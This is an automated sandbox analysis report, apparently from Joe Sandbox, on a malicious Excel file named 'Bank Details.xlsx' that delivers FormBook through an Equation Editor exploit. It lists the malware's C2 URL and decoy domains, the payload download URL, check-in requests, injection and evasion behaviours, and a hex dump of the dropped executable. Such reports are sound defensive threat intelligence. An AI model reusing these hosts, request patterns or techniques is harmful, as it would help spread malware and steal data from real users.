Analysis Report Bank Details.xlsx

Overview

General Information

Sample Name: Bank Details.xlsx
Analysis ID: 385368
MD5: c8aa551fd4cc3b5d6e87ea3f025fa6f2
SHA1: 3285390c80ccb179471f31cb4552db8802de518c
SHA256: d22df2dfcfccf5964421ffbbceee8193dc4b6cb6663ea2a3c9687ca57d6779a5
Tags: HostgatorVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Metadefender: Detection: 13% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll Metadefender: Detection: 18% Perma Link
Source: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll ReversingLabs: Detection: 37%
Source: C:\Users\Public\vbc.exe Metadefender: Detection: 13% Perma Link
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 75%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.help.exe.1027960.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.2e30000.15.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.help.exe.44c4c0.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2218410009.0000000000579000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 4_2_0040531D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 4_2_00405CB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004026BC FindFirstFileA, 4_2_004026BC

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 77MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_004162B0
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00415644
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_1_004162B0
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_1_00415644
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop edi 7_2_000962B0
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop edi 7_2_00095644
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: fqe.short.gy
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 52.59.165.42:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 52.59.165.42:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.stone-master.info/aqu2/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:38:07 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Wed, 07 Apr 2021 13:42:46 GMTETag: "324f1-5bf621b210103"Accept-Ranges: bytesContent-Length: 206065Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 6c 4a a8 a1 0d 24 fb a1 0d 24 fb a1 0d 24 fb 2f 05 7b fb a3 0d 24 fb a1 0d 25 fb 39 0d 24 fb 22 05 79 fb b0 0d 24 fb f5 2e 14 fb a8 0d 24 fb 66 0b 22 fb a0 0d 24 fb 52 69 63 68 a1 0d 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1d cd 38 45 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 86 02 00 00 04 00 00 66 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 74 00 00 b4 00 00 00 00 80 03 00 67 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fe 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 64 02 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 67 05 00 00 00 80 03 00 00 06 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1Host: www.hostvngiare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1Host: www.christlicheliebe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1Host: www.18598853855.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1Host: www.starr2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.59.165.42 52.59.165.42
Source: Joe Sandbox View IP Address: 103.141.138.117 103.141.138.117
Source: Joe Sandbox View IP Address: 198.54.117.212 198.54.117.212
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /documepnt/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdypmrimelimtewsosq.dns.army
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C8CCA5F.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /documepnt/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdypmrimelimtewsosq.dns.army
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1Host: www.hostvngiare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1Host: www.christlicheliebe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1Host: www.18598853855.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1Host: www.starr2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: fqe.short.gy
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Apr 2021 09:39:38 GMTContent-Type: text/htmlContent-Length: 808Connection: closeLast-Modified: Sat, 27 Jul 2019 17:29:53 GMTETag: "328-58ead01c2b1d3"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div
Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
